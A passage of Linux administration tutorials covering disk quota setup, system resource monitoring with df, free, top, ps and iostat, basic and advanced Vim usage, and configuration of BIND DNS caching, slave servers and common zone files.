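The tools are normally installed with the distribution's package manager, for example (on RedHat-based systems 'quotatool' may need to come from a third-party repository):

# Debian
$ sudo apt-get install quota quotatool

# RedHat
[root@gateway ~]# yum install quota quotatool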

The administrator also needs to know which users are going over their quota. The system will send an email to this effect, therefore the email address of the administrator has to be entered next.

In case the user does not know what to do if the system gives him a warning message, the next entry is the contact number of the administrator. This will be displayed to the user along with the warning message. With this, the quota system installation is completed.

At this point, the user and group quota files have to be created and proper permissions given. For this, you have to assume root status and type the following commands:

# touch /aquota.user /aquota.group
# chmod 600 /aquota.*

Next, these have to be mounted in the proper place on the root file system. For this, an entry has to be made in the ‘fstab’ file in the directory /etc. In the ‘fstab’ file, the root entry has to be modified with:

noatime,nodiratime,usrjquota=aquota.user,grpjquota=aquota.group,jqfmt=vfsv0
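
Assuming the root file system lives on /dev/sda1 and is ext4 (both placeholders for your own setup), the complete fstab entry might then look like this:

/dev/sda1  /  ext4  defaults,noatime,nodiratime,usrjquota=aquota.user,grpjquota=aquota.group,jqfmt=vfsv0  0  1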

Next, the computer has to be rebooted, or the file system remounted with the command:

# mount -o remount /

 The system is now able to work with disk quotas. However, you have to allow the system to build/rebuild its table of current disk usage. For this, you must first run quotacheck.

This will examine all the quota-enabled file systems, and build a table of the current disk usage for each one. The operating system’s copy of the disk usage is then updated. In addition, this creates the disk quota files for the entire file system. If the quota already existed, they are updated. The command looks like:

# quotacheck -avugm

 Some explanation is necessary here. The (-a) tells the command that all locally mounted quota-enabled file systems are to be checked. The (-v) is to display the status information as the check proceeds. The (-u) is to enable checking the user disk quota information. The (-g) is to enable checking the group disk quota information. Finally, the (-m) tells the command not to try to remount file system read-only.

After checking and building the disk-quota files is over, the disk-quotas have to be turned on. This is done by the command ‘quotaon’ to inform the system that disk-quota should be enabled, such as:

# quotaon -avug

Here, (-a) forces all file systems in /etc/fstab to enable their quotas. The (-v) displays status information for each file system. The (-u) is for enabling the user quota. The (-g) enables the group quota.

Define Quota for Each User/Group

Now that the system is ready with quotas, you can start defining what each user or group gets as his limit. Two types of limits can be defined. One is the soft limit and the other is the hard limit. To set the two limits try editing the size and inode size with:

# edquota -u $USER

This allows you to edit the following line:

/dev/sda1   1024  200000  400000 1024 0    0

Here, the soft limit is 200000 (200MB) and the hard limit is 400000 (400MB). You may change it to suit your user (denoted by $USER).

The soft limit has a grace period of 7 days by default. It can be changed to days, hours, minutes, or seconds as desired by:

# edquota -t

This allows you to edit the line below. It has been modified to change the default to 15 minutes:

/dev/sda1                 15minutes                  7days


For editing group quota use:

# edquota -g $GROUP

Quota Status Report

Now that you have set a quota, it is easy to create a mini report on how much space a user has used. For this use the command:

root@gateway [~]# repquota  -a

*** Report for user quotas on device /dev/vzfs
Block grace time: 00:00; Inode grace time: 00:00
                            Block  limits                      File limits
User         used    soft    hard  grace    used  soft  hard  grace
---------------------------------------------------------------------
root        --  5578244       0       0     117864     0     0      
bin         --    30936       0       0        252     0     0      
mail        --       76       0       0         19     0     0      
nobody      --        0       0       0          3     0     0      
mailnull    --     3356       0       0        157     0     0      
smmsp       --        4       0       0          2     0     0      
named       --      860       0       0         11     0     0      
rpc         --        0       0       0         1      0     0      
mailman     --    40396       0       0       2292     0     0      
dovecot     --        4       0       0          1     0     0      
mysql       --   181912       0       0        857     0     0      
firewall    --    92023      153600 153600     21072   0     0      
#55         --     1984       0       0         74     0     0      
#200        --     1104       0       0         63     0     0      
#501        --     6480       0       0         429    0     0      
#506        --      648       0       0         80     0     0      
#1000       --     7724       0        0       878     0     0      
#50138      --    43044       0        0      3948     0     0

Once the user and group quotas are set up, it is simple to manage your storage and you no longer allow users to hog all of the disk space. By using disk quotas you force your users to be tidier, and users and groups will not fill their home directories with junk or old documents that are no longer needed.


Linux System Resource & Performance Monitoring

You may be a user at home, a user in a LAN (local area network), or a system administrator of a large network of computers. Alternatively, you may be maintaining a large number of servers with multiple hard drives. Whatever may be your function, monitoring your Linux system is of paramount importance to keep it running in top condition.

While monitoring a complex computer system, some of the basic things to be kept in mind are the utilization of the hard disk, memory or RAM, CPU, the running processes, and the network traffic. Analysis of the information made available during monitoring is necessary, since all the resources are limited. Reaching the limits or exceeding them on any of the resources could lead to severe consequences, which may even be catastrophic.

Monitoring The Hard Disk Space

Use a simple command like:

$ df -h

This results in the output:

Filesystem      Size  Used Avail Use% Mounted on
/dev/sda1        22G  5.0G   16G  24% /
/dev/sda2        34G   23G  9.1G  72% /home

This shows there are two partitions (1 & 2) of the hard disk sda, which are currently at 24% and 72% utilization. The total size is shown in gigabytes (G), along with how much is used and how much remains available. However, checking each hard disk by hand to see the percentage used can be a big drag. It is better to have the system check the disks and inform you by email if there is a potential danger. A Bash script may be written for this and run at specific times as a cron job.
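
A minimal sketch of such a script (the 90% threshold and the mail recipient are assumptions):

#!/bin/bash
# email a warning when any mounted filesystem exceeds the threshold
THRESHOLD=90
ALERT=$(df -hP | awk -v t="$THRESHOLD" 'NR>1 { gsub("%","",$5); if ($5+0 > t+0) print }')
if [ -n "$ALERT" ]; then
    echo "$ALERT" | mail -s "Disk usage warning on $(hostname)" root@localhost
fi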

For the GUI, there is a graphical tool called ‘Baobab’ for checking the disk usage. It shows how a disk is being used and displays the information in the form of either multicolored concentric rings or boxes.

Monitoring Memory Usage

RAM or memory is used to run the current application. Under Linux, there are a number of ways you can check the used memory space -- both in static and dynamic conditions.

For a static snapshot of the memory, use ‘free -m’ which results in the output:

$ free -m
             total       used       free     shared    buffers     cached
Mem:          1998       1896        101          0         59        605
-/+ buffers/cache:        1231        766
Swap:          290          77        213

Here, the total amount of RAM is depicted in megabytes (MB), along with cache and swap. A somewhat more detailed output can be obtained by the command ‘vmstat’:

root@gateway [~]# vmstat
procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
 r  b   swpd    free   buff  cache   si   so    bi    bo   in   cs  us sy id wa st
 1  0      0  767932      0      0    0    0    10     3    0    1   2  0 97  0  0
root@gateway [~]#

However, if a dynamic situation of what is happening to the memory is to be examined, you have to use ‘top’ or ‘htop’. Both will give you a picture of which process is using what amount of memory and the picture will be updated periodically. Both ‘top’ and ‘htop’ will also show the CPU utilization, tasks running and their PID. Whereas ‘top’ has a purely numerical display, ‘htop’ is somewhat more colorful and has a semi-graphic look. There is also a list of command menus at the bottom for set up and specific operations.

root@gateway [~]# top

top - 01:04:18 up 81 days, 11:05,  1 user,  load average: 0.08, 0.28, 0.33
Tasks:  47 total,   1 running,  45 sleeping,   0 stopped,   1 zombie
Cpu(s):  2.4%us,  0.4%sy,  0.0%ni, 96.7%id,  0.5%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:    1048576k total,   261740k used,   786836k free,        0k buffers
Swap:         0k total,        0k used,        0k free,        0k cached

  PID    USER     PR   NI  VIRT  RES  SHR S  %CPU   %MEM    TIME+    COMMAND                                
    1   root      15   0  10372  736  624 S  0.0    0.1     1:41.86   init                                   
 5407   root      18   0  12424  756  544 S  0.0    0.1     0:13.71   dovecot                                
 5408   root      15   0  19068 1144  892 S  0.0    0.1     0:12.09   dovecot-auth                           
 5416   dovecot   15   0  38480 2868 2008 S  0.0    0.3     0:10.80   pop3-login                             
 5417   dovecot   15   0  38468 2880 2008 S  0.0    0.3     0:49.31   pop3-login                             
 5418   dovecot   16   0  38336 2700 2020 S  0.0    0.3     0:01.15   imap-login                             
 5419   dovecot   15   0  38484 2856 2020 S  0.0    0.3     0:04.69   imap-login                             
 9745   root      18   0  71548  22m 1400 S  0.0    2.2     0:01.39   lfd                                    
11501  root       15   0   160m  67m 2824 S  0.0    6.6     1:32.51   spamd                                  
23935  firewall   18   0  15276 1180  980 S  0.0    0.1     0:00.00   imap                                   
23948  mailnull   15   0  64292 3300 2620 S  0.0    0.3     0:05.62   exim                                   
23993  root       15   0   141m  49m 2760 S  0.0    4.8     1:00.87   spamd                                  
24477  root       18   0  37480 6464 1372 S  0.0    0.6     0:04.17   queueprocd                             
24494  root       18   0  44524 8028 2200 S  0.0    0.8     1:20.86   tailwatchd                             
24526  root       19   0  92984  14m 1820 S  0.0    1.4     0:00.00   cpdavd                                 
24536  root       33  18  23892 2556  680 S  0.0    0.2     0:02.09   cpanellogd                             
24543  root       18   0  87692  11m 1400 S  0.0    1.1     0:33.87   cpsrvd-ssl                             
25952  named      22   0   349m 8052 2076 S  0.0    0.8    20:17.42   named                                  
26374  root       15  -4  12788  752  440 S  0.0    0.1     0:00.00   udevd                                  
28031  root       17   0  48696 8232 2380 S  0.0    0.8     0:00.07   leechprotect                           
28038  root       18   0  71992 2172  132 S  0.0    0.2     0:00.00   httpd                                  
28524  root       18   0  90944 3304 2584 S  0.0    0.3     0:00.01   sshd

For a graphical display of how the memory is being utilized, the Gnome System Monitor gives a detailed picture. There are other system monitors available under various window managers in Linux.

Monitoring CPU(s)

You may have a single, a dual core, or a quad core CPU in your system. To see what each CPU is doing or how two CPUs are sharing the load, you have to use ‘top’ or ‘htop’. These command line applications show the percentage of each CPU being utilized. You can also see process statistics, memory utilization, uptime, load average, CPU status, process counts, and memory and swap space utilization statistics.

Similar output statistics may be seen by using command line tools such as the ‘mpstat’, which is part of a group package called ‘sysstat’. You may have to install ‘sysstat’ in your system, since it may not be installed by default. Once installed, you can monitor a variety of parameters, for example compare the CPU utilization of an SMP system or multi-processor system.

Finding out if any specific process is hogging the CPU needs a little more command line instruction such as:

$ ps -eo pcpu,pid,user,args | sort -r -k1 | less

OR

$ ps -eo pcpu,pid,user,args | sort -k 1 -r | head -10

Similar output can be obtained by using the command ‘iostat’ as root:

root@gateway [~]# iostat -xtc 5 3
Linux 2.6.18-028stab094.3 (gateway.firewall.cx)         01/11/2012

Time: 01:13:15 AM
avg-cpu:  %user   %nice   %system  %iowait  %steal   %idle
          2.38    0.01     0.43     0.46    0.00     96.72

Time: 01:13:20 AM
avg-cpu:  %user   %nice   %system  %iowait  %steal   %idle
          3.89    0.00     0.26     0.09     0.00     95.77

Time: 01:13:25 AM
avg-cpu:  %user   %nice   %system  %iowait  %steal   %idle
          0.31    0.00    0.15      1.07     0.00     98.47

This will produce three reports at five-second intervals; the first report shows averages since the last reboot.

CPU usage under GUI is very well depicted by the Gnome System Monitor and other system monitoring applications. These are also useful for monitoring remote servers. Detailed memory maps can be accessed, signals can be sent and processes controlled remotely.

linux-system-monitoring-1 (Gnome System Monitor)

Linux Processes

How do you know what processes are currently running in your Linux system? There are innumerable ways of getting to see this information. The handiest applications are the old faithfuls - ‘top’ and ‘htop’. They will give a real-time image of what is going on under the hood. However, if you prefer a more static view, use ‘ps’. To see all processes try ‘ps -A’ or ‘ps -e’:

root@gateway [~]# ps -e
PID TTY          TIME CMD
    1 ?          00:01:41 init
 3201 ?        00:00:00 leechprotect
 3208 ?        00:00:00 httpd
 3360 ?        00:00:00 httpd
 3490 ?        00:00:00 httpd
 3530 ?        00:00:00 httpd
 3532 ?        00:00:00 httpd
 3533 ?        00:00:00 httpd
 3535 ?        00:00:00 httpd
 3575 ?        00:00:00 httpd
 3576 ?        00:00:00 httpd
 3631 ?        00:00:00 imap
 3694 ?        00:00:00 httpd
 3705 ?        00:00:00 httpd
 3770 ?        00:00:00 imap
 3774 pts/0    00:00:00 ps
 5407 ?        00:00:13 dovecot
 5408 ?        00:00:12 dovecot-auth
 5416 ?        00:00:10 pop3-login
 5417 ?        00:00:49 pop3-login
 5418 ?        00:00:01 imap-login
 5419 ?        00:00:04 imap-login
 9745 ?        00:00:01 lfd
11501 ?        00:01:35 spamd
23948 ?        00:00:05 exim
23993 ?        00:01:00 spamd
24477 ?        00:00:04 queueprocd
24494 ?        00:01:20 tailwatchd
24526 ?        00:00:00 cpdavd
24536 ?        00:00:02 cpanellogd
24543 ?        00:00:33 cpsrvd-ssl
25952 ?        00:20:17 named
26374 ?        00:00:00 udevd
28524 ?        00:00:00 sshd
28531 pts/0    00:00:00 bash
29834 ?        00:00:00 sshd
30426 ?        00:11:27 syslogd
30429 ?        00:00:00 klogd
30473 ?        00:00:00 xinetd
30485 ?        00:00:00 mysqld_safe
30549 ?        1-15:07:28 mysqld
32158 ?        00:06:29 httpd
32166 ?        00:12:39 pure-ftpd
32168 ?        00:07:12 pure-authd
32181 ?        00:01:06 crond
32368 ?        00:00:00 saslauthd
32373 ?        00:00:00 saslauthd

PS is an extremely powerful and versatile command, and you can learn more by ‘ps --h’:

root@gateway [~]# ps --h
********* simple selection *********  ********* selection by list *********
-A all processes                         -C by command name
-N negate selection                      -G by real group ID (supports names)
-a all w/ tty except session leaders     -U by real user ID (supports names)
-d all except session leaders            -g by session OR by effective group name
-e all processes                         -p by process ID
T  all processes on this terminal        -s processes in the sessions given
a  all w/ tty, including other users     -t by tty
g  OBSOLETE -- DO NOT USE                -u by effective user ID (supports names)
r  only running processes                 U  processes for specified users
x  processes w/o controlling ttys         t  by tty
*********** output format **********  *********** long options ***********
-o,o user-defined   -f full               --Group --User --pid --cols --ppid
-j,j job control    s  signal             --group --user --sid --rows --info
-O,O preloaded     -o  v  virtual memory  --cumulative --format --deselect
-l,l long              u  user-oriented   --sort --tty --forest --version
-F   extra full        X  registers       --heading --no-heading --context
                    ********* misc options *********
-V,V  show version     L  list format codes   f  ASCII art forest
-m,m,-L,-T,H  threads  S  children in sum    -y change -l format
-M,Z  security data    c  true command name  -c scheduling class
-w,w  wide output      n  numeric WCHAN,UID  -H process hierarchy


Linux VIM / Vi Editor - Tutorial - Basic & Advanced Features

When you are using Vim, you want to know three things - getting in, moving about and getting out. Of course, while doing these three basic operations, you would like to do something meaningful as well. So, we start with getting into Vim.

Assuming that you are in a shell, or in the command line, you can simply type 'vim' and the application starts:

root@gateway [~]# vim

 Exiting the VIM application is easily accomplished: type ':' followed by a 'q', hit the 'Enter' key and you are out:

~
~                                         VIM - Vi IMproved
~
~                                          version 7.0.237
~                                     by Bram Moolenaar et al.
~                                 Modified by <email address>
~                            Vim is open source and freely distributable
~
~                                   Become a registered Vim user!
~                          type  :help register<Enter>   for information
~
~                          type  :q<Enter>               to exit        
~                          type  :help<Enter>  or  <F1>  for on-line help
~                          type  :help version7<Enter>   for version info
~
:q
root@gateway [~]#

 That's how you start and stop the Vim car. Now, let's try to learn how to steer the car.

You can move around in Vim, using the four arrow keys. However, a faster way is to use the 'h', 'j', 'k' and 'l' keys. This is because the keys are always under your right hand and you do not need to move your hand to access them as with the arrow keys. The 'j' moves the cursor down, 'k' moves it up. The 'h' key moves the cursor left, while 'l' moves it to the right. That's how you steer the Vim car.

You can edit a file using Vim. You either have an existing file, or you make a new one. If you start with 'vim filename', you edit the file represented by the 'filename'. If the file does not exist, Vim will create a new file. Now, if you want to edit a file from within Vim, open the file using ':e filename'. If this file is a new file, Vim will inform you. You can save the file using the ':w' command.

If you need to search the file you are editing for a specific word or string, simply type forward-slash '/' followed by the word you would like to search for. After hitting 'enter', VIM will automatically take you to the first match.  By typing forward-slash '/' again followed by 'enter' it will take you to the next match.

To write or edit something inside the file, you can start by typing ':i' and Vim will enter the 'Insert' mode. Once you have finished, you can exit the Insert mode by pressing the 'Esc' key, and undo the changes you made with ':e!'. You also have a choice to either save the file using the ':w' command, or save & quit by using ':wq'. Optionally, you can abort the changes and quit by ':q!'.

If you have made a change and want to quit without explicitly informing Vim whether you want to save the file or not, Vim will rightly complain, but will also guide you to use the '!'.

Command Summary

Start VIM:  vim
Quit Program: :q
Move Cursor: Arrow keys or j, k, h, l (down, up, left, right)
Edit file: vim filename
Open file (within VIM):  :e filename  e.g   :e bash.rc
Search within file: /'string'  e.g /firewall  
Insert mode:  :i
Save file:   :w
Save and Quit:  :wq
Abort and Quit:  :q!

Advanced Features of VIM

Now that you know your way in and out of Vim, and how to edit a file, let us dig a little deeper. For example, how can you add something at the end of a line, when you are at its starting point? Well, one way is to keep the right arrow pressed, until you get to the end. A faster way is 'Shift+a' and you are at the end of the line. To go to the beginning of the line, you must press 'Shift+i'. Make sure you are out of the 'Insert' mode shown at the bottom; use the 'Esc' for this.

Supposing you are in the middle of a line and would like to start inserting text into a new line just below it. One way would be to move the cursor right and hit 'Enter' when you reach the end. A faster way is to enter 'o', which opens a new line below the cursor and puts you straight into Insert mode; 'Shift+o' does the same but creates the new line above the cursor. Don't forget to exit the 'Insert' mode by pressing 'Esc'.

How do you delete lines? Hold the 'delete' button and wait until the lines are gone. How can you do it faster? Use the 'd' command. If you want to delete 10 lines below your cursor position and the current line, try 'd10j'. To delete 5 lines above your current position and the current line, try 'd5k'. Note the 'j' and 'k' (down, up) covered in our previous section. If you’ve made a mistake, recover it with the undo command, 'u'. Redo it with 'Ctrl+r'.

Tip 1: To delete the current line alone, use 'dd'.

Tip 2: To delete the current line and the one below it, use 'd2d'.

Did you know you can have windows in Vim? Oh yes, you can. Try 'Ctrl+w+s' if you want a horizontal split, and 'Ctrl+w+v' if you want a vertical split. Move from one window to another by using 'Ctrl+w+w'. After you have finished traveling through all the windows, close them one by one using 'Ctrl+w+c'.

 Here is an example with four (4) windows within the Vim environment:

linux-vim-editor-1

You can record macros in Vim and run them. To record a macro, press 'q' followed by a register letter, for example 'qm' to record into register m. To stop recording, hit 'q' again. To play the macro back, press '@m'. To rerun the last macro, press '@@'. Macros are most useful when you need to perform the same sequence of commands repeatedly within a file.

Vim also has extensive help facilities. To learn about a command, say 'e', type ':h e' and hit 'Enter'. You will see how the command 'e' can be useful. To come back to where you were, type ‘:q’ and then ‘Enter’. Incidentally, typing ':he' and 'Enter' will open up the general help section. Come back with the same ':q'.

As an example, here's what we got when we typed ':h e' (that's an ":" + "h" + space + "e"):

linux-vim-editor-2

When we typed ':he', we were presented with the main help file of VIM:

linux-vim-editor-3

Command Summary

Move cursor to end of line:  Shift+a
Move cursor to beginning of line:  Shift+i
Delete current line: dd
Delete 10 lines below cursor position: d10j
Delete 5 lines above cursor position: d5k
Undo:  u
Redo: Ctrl+r
Window Mode - Horizontal:  Ctrl+w+s
Window Mode - Vertical Split:  Ctrl+w+v
Move between windows: Ctrl+w+w
Close Window: Ctrl+w+c
Record Macro:  q followed by a register, e.g. qm (press q again to stop)
Play Macro:  @m  (rerun with @@)
Help:    :h 'command'  from within VIM. e.g  :h e




Linux BIND DNS - Part 6: Linux BIND - DNS Caching

In the previous articles, we spoke about the Internet domain hierarchy and explained how the ROOT servers are the DNS servers that hold the information about the authoritative DNS servers for the domains immediately below them, e.g. firewall.cx, microsoft.com. In fact, when a request is passed to any of the ROOT DNS servers, they will redirect the client to the appropriate authoritative DNS server, that is, the DNS server in charge of the domain.

For example, if you're trying to resolve firewall.cx and your machine contacts a ROOT DNS server, the server will point your computer to the DNS server in charge of the .CX domain, which in turn will point your computer to the DNS server in charge of firewall.cx, currently the server with IP 74.200.90.5.

Understanding DNS Caching and its Implications

As you can see, a simple DNS request can become quite a task in order to successfully resolve the domain. This also means that there's a fair bit of traffic generated in order to complete the procedure. Whether you're paying a flat rate to your ISP or your company has a permanent connection to the Internet, the truth is that someone ends up paying for all these DNS requests! The above example was only one computer trying to resolve one domain. Try to imagine a company that has 500 computers connected to the Internet or an ISP with 150,000 subscribers - now you're starting to get the big picture!

All that traffic is going to end up on the Internet if something isn't done about it, not to mention who will be paying for it!

This is where DNS Caching comes in. If we're able to cache all these requests, then we don't need to ask the ROOT DNS or any other external DNS server as long as we are trying to resolve previously visited sites or domains, because our caching system would "remember" all the previous domains we visited (and therefore resolved) and would be able to give us the IP Address we're looking for!

Note: You should keep in mind that when you install BIND, by default it's set up to be a DNS caching server, so all you need to do is start up the service, which is called 'named'.

Almost all Internet name servers use name caching to optimise search costs. Each of these servers maintains a cache which contains all recently used names as well as a record of where the mapping information for that name was obtained. When a client (e.g your computer) asks the server to resolve a domain, the server will first check to see whether it has authority (meaning if it is in charge) for that domain. If not, the server checks its cache to see if the domain is in there and it will find it if it's been recently resolved.

Assuming that the server does find it in the cache, it will take the information and pass it on to the client but also mark the information as a nonauthoritative binding, which means the server tells the client "Here is the information you required, but keep in mind, I am not in charge of this domain".

The information can be out of date and, if it is critical for the client that it does not receive such information, it will then try to contact the authoritative DNS server for the domain and obtain the up to date information it requires.

DNS Caching Does Come with its Problems!

As you can clearly see, DNS caching can save you a lot of money, but it comes with its problems!

Caching does work well in the domain name system because name to address bindings change infrequently. However, they do change. If the servers cached the information the first time it was requested and never changed that information, the entries in the cache could become incorrect.

The Solution To DNS Caching Problems

Fortunately there is a solution that will prevent DNS servers from giving out incorrect information. To ensure that the information in the cache is correct, every DNS server will time each entry and dispose of the ones that have exceeded a reasonable time. When a DNS server is asked for the information after it has removed the entry from its cache, it must go back to the authoritative source and obtain it again.

Whenever an authoritative DNS server responds to a request, it includes a Time To Live (TTL) value in the response. This TTL value is set in the zone files as you've probably already seen in the previous pages.
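
You can see the TTL an authoritative server hands out with a simple query; the output below is purely illustrative:

$ dig firewall.cx A +noall +answer
firewall.cx.    3600    IN    A    74.200.90.5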

If you manage a DNS server and are planning changes in the next couple of weeks, such as redelegating (moving) your domain to another hosting company, changing the IP address of your website, or changing mail servers, it's a good idea to lower your TTL to a very small value well before the scheduled change. The reason is that any DNS server that queries your domain, website or any resource record belonging to your domain will cache that data for as long as the TTL specifies.

By decreasing the $TTL value to, e.g., 1 hour, you ensure that all DNS data from your domain will expire in the requester's cache 1 hour after it was received. If you didn't do this, the servers and clients (simple home users) that access your site or domain would cache the DNS data for the currently set time, which is normally around 3 days. Not a good thing when you make a big change :)

So keep all the above in mind when you're about to perform a change in the DNS server zone files. A couple of days before making the change, decrease the $TTL value to a reasonable value, not more than a few hours, and once you complete the change, be sure to set it back to what it was.
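
In practice this is just the $TTL directive at the top of the zone file; the values, serial number and hostnames below are examples only (3600 seconds = 1 hour):

$TTL 3600    ; temporarily lowered from e.g. 259200 (3 days) before the change
@   IN  SOA  gateway.firewall.cx. hostmaster.firewall.cx. (
             2012011101 ; serial
             10800      ; refresh
             3600       ; retry
             604800     ; expire
             3600 )     ; negative caching TTL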

We hope this has given you an insight into how you can save yourself, or your company, money and the problems that occur when changing fields and values in the DNS zone files!


Linux BIND DNS - Part 5: Configure Secondary (Slave) DNS Server

Setting up a Secondary (or Slave) DNS server is much easier than you might think. All the hard work is done when you set up the Master DNS server by creating your database zone files and configuring the named.conf file.

If you are wondering how the Slave DNS server can be so easy to set up, remember that all the Slave DNS server does is update its database from the Master DNS server (a zone transfer). Almost all of the files we configured on the Master DNS server are copied to the Slave DNS server, which acts as a backup in case the Master DNS server fails.

Setting Up The Slave DNS Server

Let's have a closer look at the requirements for getting our Slave DNS server up and running.

Keeping in mind that the Slave DNS server is on another machine, we are assuming that you have downloaded and successfully installed the same BIND version on it. We need to copy 3 files from the Master DNS server, make some minor modifications to one file and launch our Slave DNS server.... the rest will happen automatically :)

So which files do we copy?

The files required are the following:

  • named.conf (our configuration file)
  • named.ca or db.cache (the root hints file, contains all root servers)
  • named.local (local loopback for the specific DNS server so it can direct traffic to itself)

The rest of the files, which are our db.DOMAIN (db.firewall.cx for our example) and db.in-addr.arpa (db.192.168.0 for our example), will be transferred automatically (zone transfer) as soon as the newly brought up Slave DNS server contacts the Master DNS server to check for any zone files.

How do I copy these files?

There are plenty of ways to copy the files between servers. The method you will use depends on where the servers are located. If, for example, they are right next to you, you can simply use a floppy disk to copy them or use ftp to transfer them.

If you're going to try to transfer them over a network, and especially over the Internet, then you might consider something more secure than ftp. We would recommend you use SCP, which stands for Secure Copy and uses SSH (Secure SHell).

SCP can be used independently of SSH as long as there is an SSH server on the other side. SCP will allow you to transfer files over an encrypted connection and therefore is preferred for sensitive files, plus you get to learn a new command :)

The command used is as follows: scp localfile-to-copy username@remotehost:destination-folder. Here is the command line we used from our Gateway server (Master DNS): scp /etc/named.conf root@voyager:/etc/
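Copying the remaining two files works the same way. A minimal sketch, assuming the data files live in /var/named as defined in the options section of named.conf (adjust the paths if your installation differs):

scp /etc/named.conf root@voyager:/etc/
scp /var/named/named.ca root@voyager:/var/named/
scp /var/named/named.local root@voyager:/var/named/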

Keep in mind that the files we copy are placed in the same directory as on the Master DNS server. Once we have copied all three files we need to modify the named.conf file. To make things simple, we are going to show you the original file copied from the Master DNS and the modified version which now sits on the Slave DNS server.

The Master named.conf file is a straight cut/paste from the "Common BIND Files" page, whereas the Slave named.conf has been modified to suit our Slave DNS server. The changes are in the type, file and masters statements of the two domain zone entries, which we explain below:

Master named.conf file

options {
directory "/var/named";

};


// Root Servers
zone "." IN {
type hint;
file "named.ca";
};

// Entry for Firewall.cx - name to ip mapping
zone "firewall.cx" IN {
type master;
file "db.firewall.cx";
};


// Entry for firewall.cx - ip to name mapping
zone "0.168.192.in-addr.arpa" IN {
type master;
file "db.192.168.0";
};

// Entry for Local Loopback
zone "0.0.127.in-addr.arpa" IN {
type master;
file "named.local";
};

 

Slave named.conf file

options {
directory "/var/named";

};


// Root Servers
zone "." IN {
type hint;
file "named.ca";
};

// Entry for Firewall.cx - name to ip mapping
zone "firewall.cx" IN {
type slave;
file "bak.firewall.cx";
masters { 192.168.0.10 ; } ;
};

// Entry for firewall.cx - ip to name mapping
zone "0.168.192.in-addr.arpa" IN {
type slave;
file "bak.192.168.0";
masters { 192.168.0.10 ; } ;
};

// Entry for Local Loopback
zone "0.0.127.in-addr.arpa" IN {
type master;
file "named.local";
};

As you can see, most of the slave's named.conf file is similar to the master's, except for a few fields and values, which we are going to explain right now.

The type value is now slave, and that's pretty logical, since it tells the DNS server whether it is a master or a slave for the zone.

The file "bak.firewall.cx"; entry basically tells the server what name to give the zone files once they are transfered from the master dns server. We tend to follow the bak.domain format because that's the way we see the slave server, a backup dns server. It is not imperative to use this name scheme, you can change it to whatever you wish. Once the server is up and running, you will see these files soon appear in the /var/named directory.

Lastly, the masters { 192.168.0.10; }; entry informs our slave server of the IP Address of the Master DNS server it needs to contact to retrieve the zone files. That's all there is to setting up the Slave DNS server! As we mentioned, once the master is set up, the slave is a piece of cake because it involves very few changes.
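Once named is started on the slave, you can confirm the zone transfers have taken place by looking for the backup zone files; this is a minimal check, assuming the /var/named directory used throughout this series:

ls -l /var/named/bak.*

If the bak.firewall.cx and bak.192.168.0 files are present, the slave has successfully pulled the zones from the master.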

Our final article covers the setup of Linux BIND DNS Caching.


Linux BIND DNS - Part 4: Common BIND Files - Named.local, named.conf, db.127.0.0 etc

So far we have covered in great detail the main files required for the firewall.cx domain. These files, which we named db.firewall.cx and db.192.168.0, define all the resource records and hosts available in the firewall.cx domain.

In this article we will be analysing the remaining common files, to help you understand why they exist and how they fit into the big picture:

Our Common Files

There are 3 common files that we're going to look at, of which the first two have contents that change slightly depending on the domain. This happens because they must be aware of the various hosts and the domain name for which they are created. The third file in the list below is always the same amongst all DNS servers and we will explain more about it later on.

So here are our files:

  • named.local or db.127.0.0
  • named.conf
  • named.ca or db.cache

The Named.local File

The named.local file, or db.127.0.0 as some might call it, is used to cover the loopback network. Since no one was given the responsibility for the 127.0.0.0 network, we need this file to make sure there are no errors when the DNS server needs to direct traffic to itself (127.0.0.1 IP Address - Loopback).

When installing BIND, you will find this file in your caching example directory: /var/named/caching-example, so you can either create a new one or modify the existing one to meet your requirements.

The file is no different than our example db.addr file we saw previously:

$TTL 86400

0.0.127.in-addr.arpa. IN SOA voyager.firewall.cx. admin.firewall.cx. (

                1 ; Serial
                3h ; Refresh after 3 hours
                1h ; Retry after 1 hour
                1w ; Expire after 1 week
                1h ) ; Negative caching TTL of 1 hour

 

0.0.127.in-addr.arpa. IN NS voyager.firewall.cx.
0.0.127.in-addr.arpa. IN NS gateway.firewall.cx.
1.0.0.127.in-addr.arpa. IN PTR localhost.

That's all there is to the named.local file!

The Named.ca File

The named.ca file (also known as the "root hints file") is created when you install BIND and doesn't need to be modified unless you have an old version of BIND or it's been a while since you installed it.

The purpose of this file is to let your DNS server know about the Internet ROOT servers. There is no point displaying all of the file's contents because it's quite big, so we will show a single ROOT server entry to give you an idea of what it looks like:

; last update: Aug 22, 2011
; related version of root zone: 1997082200
; formerly NS.INTERNIC.NET

. 3600000 IN NS A.ROOT-SERVERS.NET.
A.ROOT-SERVERS.NET. 3600000 A 198.41.0.4
The domain name "." refers to the root zone and the value 3600000 is the explicit time to live (TTL) for the records in the file, but it is sometime ignored by DNS clients.

The rest of the entries are self-explanatory. If you want to grab a new copy of the root hints file, you can ftp to ftp.rs.internic.net (198.41.0.6) and log on anonymously; there you will find the latest, up-to-date version.
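If you prefer to fetch the file non-interactively, something like the following should work; this is only a sketch and assumes the file is still published under the /domain/named.root path and that wget is installed:

wget ftp://ftp.rs.internic.net/domain/named.root -O /var/named/named.ca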

The Named.conf File

The named.conf file is usually located in the /etc directory and is the key file that ties all the zone data files together and lets the DNS server know where they are located in the system. This file is automatically created during the installation but you must edit it in order to add new entries that will point to any new zone files you have created.

Let's have a close look at the named.conf file and explain:

options {
directory "/var/named";

};

// Root Servers
zone "." IN {
type hint;
file "named.ca";
};

// Entry for Firewall.cx - name to ip mapping
zone "firewall.cx" IN {
type master;
file "db.firewall.cx";
};

// Entry for Firewall.cx - ip to name mapping
zone "0.168.192.in-addr.arpa" IN {
type master;
file "db.192.168.0";
};

// Entry for Local Loopback
zone "0.0.127.in-addr.arpa" IN {
type master;
file "named.local";
};

At first glance it might seem a maze, but it's a lot simpler than you think. Break down each paragraph and you can see clearly the pattern that follows.

Starting from the top, the options section simply defines the directory where all the files to follow are located, the rest are simply comments.

The root servers section tells the DNS server where to find the root hints file, which contains all the root servers.

Next up is the entry for our domain firewall.cx: we let the DNS server know which file contains all the zone entries for this domain and that it will act as a master DNS server for the domain. The same applies to the entry that follows, which contains the IP-to-name mappings; this is the 0.168.192.in-addr.arpa zone.

The last entry is required for the local loopback. We tell the DNS server which file contains the local loopback entries.

